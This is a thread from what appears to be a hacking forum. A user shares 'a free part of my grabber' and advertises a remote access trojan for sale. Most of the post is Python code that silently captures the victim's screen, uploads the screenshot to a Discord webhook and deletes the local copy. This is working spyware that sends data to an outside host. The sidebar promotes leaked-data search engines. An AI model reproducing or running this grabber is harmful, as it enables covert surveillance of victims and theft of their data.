a free part of my grabber
by stackunderflow - Wednesday June 5, 2024 at 10:02 AM
#1
im working on a rat in like 3 days it will be done i will sell it for 40$ lifetime dm me

null
import os
from discord_webhook import DiscordWebhook, DiscordEmbed
from PIL import ImageGrab
user = os.path.expanduser("~")
hook =""
def screen():
    sss = ImageGrab.grab()
    temp_path = os.path.join(user, "AppData\\Local\\Temp\\ss.png")
    sss.save(temp_path)
    webhook = DiscordWebhook(url=hook)
    embed = DiscordEmbed(title="Screenshot", description="Latest screenshot capture.", color=242424)
    embed.set_author(name="kggrabber", icon_url="")
    embed.set_image(url="")
    embed.set_footer(text="kalogz on breachforums")
    webhook.add_embed(embed)
    webhook.execute()
    webhook = DiscordWebhook(url=hook)
    with open(temp_path, "rb") as f:
        webhook.add_file(file=f.read(), filename='ss.png')
    webhook.execute()
    try:
        os.remove(temp_path)
    except Exception as e:
        print(f"Error removing file: {e}")
screen()
Reply
#2
bro please .......
Ban reason: Arrested (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  (FREE) OSINT TOOLS + DATABASE SEARCH ENGINES xpjelly 839 24,380 6 hours ago
Last Post: bogahi
  free mobile number 2024 treyfas 619 32,655 6 hours ago
Last Post: bogahi
  SECRET DATABASE TG CHANNELS FREE QaboosbinSaidAlSaid 86 3,942 Yesterday, 06:36 PM
Last Post: sainttrojan
  [FREE] WEBSITE WITH 9000+ HACKING RESOURCES Instinct 16 1,750 Yesterday, 06:27 PM
Last Post: LainTheResistor
  [FREE] Leaked Data Search Engine (10+ Terabytes of data, NO REDACTED DATA) 0btkop 259 6,715 Yesterday, 05:50 PM
Last Post: gvkikaya



 Users browsing this thread: 1 Guest(s)